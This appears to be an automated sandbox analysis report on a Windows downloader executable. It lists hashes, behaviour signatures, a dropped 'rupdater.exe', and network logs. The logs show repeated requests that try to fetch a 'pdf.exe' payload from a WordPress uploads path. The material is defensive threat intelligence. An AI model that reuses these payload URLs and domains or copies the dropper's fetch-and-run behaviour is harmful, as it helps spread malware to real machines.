Analysis

  • max time kernel
    116s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/10/2022, 21:41 UTC

General

  • Target

    cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76.exe

  • Size

    18KB

  • MD5

    a0beac55bb85e9beedd1fb3df64d4890

  • SHA1

    a26c0417c08dc463f71cc3ebb688f4261d90f586

  • SHA256

    cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76

  • SHA512

    215e7ee11eb7b08c3b386d20d1c95ca65439bad1fee8464db7f21d33db1ab79abf4ac9e35a1dfa36d4291eb7827a7ee33b25a05513d7ee6bb438ca4a78efcf3e

  • SSDEEP

    192:ZdSekEVgsoqe0jc1M7cLa2gcKiQWm/L32S5WpkdbXftbrsY5s:ZdSeP+M7cWoKiQ/iSU6dbXlbrsYO

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76.exe
    "C:\Users\Admin\AppData\Local\Temp\cb6827ac3df14effa0674689b97e47289c837bdb20548fc826676b9504c32d76.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1168
    • C:\Users\Admin\AppData\Local\Temp\rupdater.exe
      "C:\Users\Admin\AppData\Local\Temp\rupdater.exe"
      2⤵
      • Executes dropped EXE
      PID:4952

Network

  • DNS (US)
    smokefreesource.com
    rupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    smokefreesource.com
    IN A
    Response
  • DNS (US)
    mtnoutfitters.com
    rupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    mtnoutfitters.com
    IN A
    Response
    mtnoutfitters.com
    IN A
    162.159.129.85
    mtnoutfitters.com
    IN A
    162.159.130.85
  • GET (US)
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    rupdater.exe
    Remote address:
    162.159.129.85:443
    Request
    GET /wp-content/uploads/2013/01/pdf.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: mtnoutfitters.com
    Cache-Control: no-cache
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 20 Oct 2022 02:30:32 GMT
    Content-Type: text/html;charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    p3p: CP="ALL PUR DSP CUR ADMi DEVi CONi OUR COR IND"
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-ua-compatible: IE=Edge,chrome=1
    x-xss-protection: 1; mode=block
    x-developer: Page: 5.0ms, Render: 0.0ms, Mem: 2,048kB, Cache: 0Q (0.0ms), DB: 0Q (0.0ms), Prop: 0Q (0.0ms)
    x-runtime: 0.005036
    x-shop-id:
    cache-control: no-cache
    vary: Accept-Encoding
    x-served-by: prd-us-east4-ecom-web-04
    x-request-id: Y1CyyBC@mrwOTxx4Z41GLwAAIMc
    via: 1.1 google
    x-envoy-upstream-service-time: 10
    CF-Cache-Status: MISS
    Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 75ce55046a19b987-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • DNS (US)
    smokefreesource.com
    rupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    smokefreesource.com
    IN A
    Response
  • GET (US)
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    rupdater.exe
    Remote address:
    162.159.129.85:443
    Request
    GET /wp-content/uploads/2013/01/pdf.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: mtnoutfitters.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 20 Oct 2022 02:30:32 GMT
    Content-Type: text/html;charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    p3p: CP="ALL PUR DSP CUR ADMi DEVi CONi OUR COR IND"
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-ua-compatible: IE=Edge,chrome=1
    x-xss-protection: 1; mode=block
    x-developer: Page: 4.5ms, Render: 0.0ms, Mem: 2,048kB, Cache: 0Q (0.0ms), DB: 0Q (0.0ms), Prop: 0Q (0.0ms)
    x-runtime: 0.004567
    x-shop-id:
    cache-control: no-cache
    vary: Accept-Encoding
    x-served-by: prd-us-east4-ecom-web-01
    x-request-id: Y1CyyNdTzIl3JKkWI0mOBQAAIAQ
    via: 1.1 google
    x-envoy-upstream-service-time: 8
    CF-Cache-Status: MISS
    Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
    Server: cloudflare
    CF-RAY: 75ce55062868b8c6-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • DNS (US)
    97.97.242.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.97.242.52.in-addr.arpa
    IN PTR
    Response
  • 162.159.129.85:443
    mtnoutfitters.com
    tls
    rupdater.exe
    639 B
    2.8kB
    8
    7
  • 52.168.117.170:443
    322 B
    7
  • 8.252.51.254:80
    322 B
    7
  • 8.253.183.120:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 209.197.3.8:80
    322 B
    7
  • 162.159.129.85:443
    mtnoutfitters.com
    tls
    rupdater.exe
    406 B
    219 B
    6
    5
  • 162.159.129.85:443
    mtnoutfitters.com
    rupdater.exe
    190 B
    92 B
    4
    2
  • 162.159.129.85:443
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    tls, http
    rupdater.exe
    1.8kB
    22.9kB
    28
    27

    HTTP Request

    GET https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe

    HTTP Response

    404
  • 162.159.129.85:443
    https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe
    tls, http
    rupdater.exe
    1.9kB
    20.2kB
    29
    28

    HTTP Request

    GET https://mtnoutfitters.com/wp-content/uploads/2013/01/pdf.exe

    HTTP Response

    404
  • 8.8.8.8:53
    smokefreesource.com
    dns
    rupdater.exe
    65 B
    138 B
    1
    1

    DNS Request

    smokefreesource.com

  • 8.8.8.8:53
    mtnoutfitters.com
    dns
    rupdater.exe
    63 B
    95 B
    1
    1

    DNS Request

    mtnoutfitters.com

    DNS Response

    162.159.129.85
    162.159.130.85

  • 8.8.8.8:53
    smokefreesource.com
    dns
    rupdater.exe
    65 B
    138 B
    1
    1

    DNS Request

    smokefreesource.com

  • 8.8.8.8:53
    97.97.242.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.97.242.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\rupdater.exe

    Filesize

    19KB

    MD5

    3a24f085d1444fec030d23356df55ad7

    SHA1

    42b49e93299a4e9b521da5c336d49add52b4955b

    SHA256

    a6df2f7ded81285b9ccbdafdf52ec95a8a995d3bf5c53d7f9935c725c8ee8c1f

    SHA512

    b19e42eec4b2d781a6c9e0d20da627a09cbbdc9f787bc6d2d134b8f99396b0dcb7038fd3bde5d4f595f99a80478fc347aa83e0550a8c167cb6524cfce5360173
